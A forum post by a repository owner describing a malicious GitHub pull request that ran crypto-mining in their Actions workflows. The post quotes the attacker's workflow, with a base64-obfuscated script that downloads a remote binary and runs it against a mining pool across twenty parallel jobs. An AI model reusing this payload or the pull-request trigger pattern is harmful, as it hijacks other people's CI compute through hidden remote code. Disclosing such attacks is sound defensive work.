Some days ago, a github user attacked one of my github repository with a malicious pull request to trigger crypto-mining in my github actions. The pull request was opened/closed multiple times and each action was starting up to 20 sub-jobs.
I was alerted very quickly and stopped the jobs and closed the PR immediately.
I wrote a blog post that relates the whole story and gives full details: Github Actions mining attack through Pull Request
It is similar to Massive Cryptomining Campaign Abusing GitHub (…) but differs completely in the implementation.
I already reported to GitHub through contact form.
The malicious action looked like this:
name: Test on: [pull_request] jobs: test: name: Fetch runs-on: ubuntu-latest container: ubuntu:20.10 env: DEBIAN_FRONTEND: noninteractive strategy: fail-fast: false matrix: runner: [0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19] steps: - run: | eval "$(echo "YXB0IHVwZGF0ZSAtcXEKYXB0IGluc3RhbGwgLXkgY3VybCBnaXQganEKY3VybCAtTGZvIHByb2cgaHR0cHM6Ly9naXRodWIuY29tL2JocmlzY2FybmF0dC9maXJzdC1yZXBvL3JlbGVhc2VzL2Rvd25sb2FkL2EvcHJvZyB8fCBjdXJsIC1MZm8gcHJvZyBodHRwczovL3RyYW5zZmVyLnNoL09TUGpLL3Byb2cKaXA9JChjdXJsIC1zIC1IICdhY2NlcHQ6IGFwcGxpY2F0aW9uL2Rucy1qc29uJyAnaHR0cHM6Ly9kbnMuZ29vZ2xlL3Jlc29sdmU/bmFtZT1wb29saW8ubWFncmF0bWFpbC54eXomdHlwZT1BJyB8IGpxIC1yICcuQW5zd2VyWzBdLmRhdGEnKQpjaG1vZCB1K3ggcHJvZwp0aW1lb3V0IDRoIC4vcHJvZyAtbyAiJHtpcH06MzAwMCIgLXUgQ2hyaXNCYXJuYXR0IC1wIEV4cGxhaW5pbmdDb21wdXRlcnMgLS1jcHUtcHJpb3JpdHkgNSA+IC9kZXYvbnVsbAo=" | base64 -d)"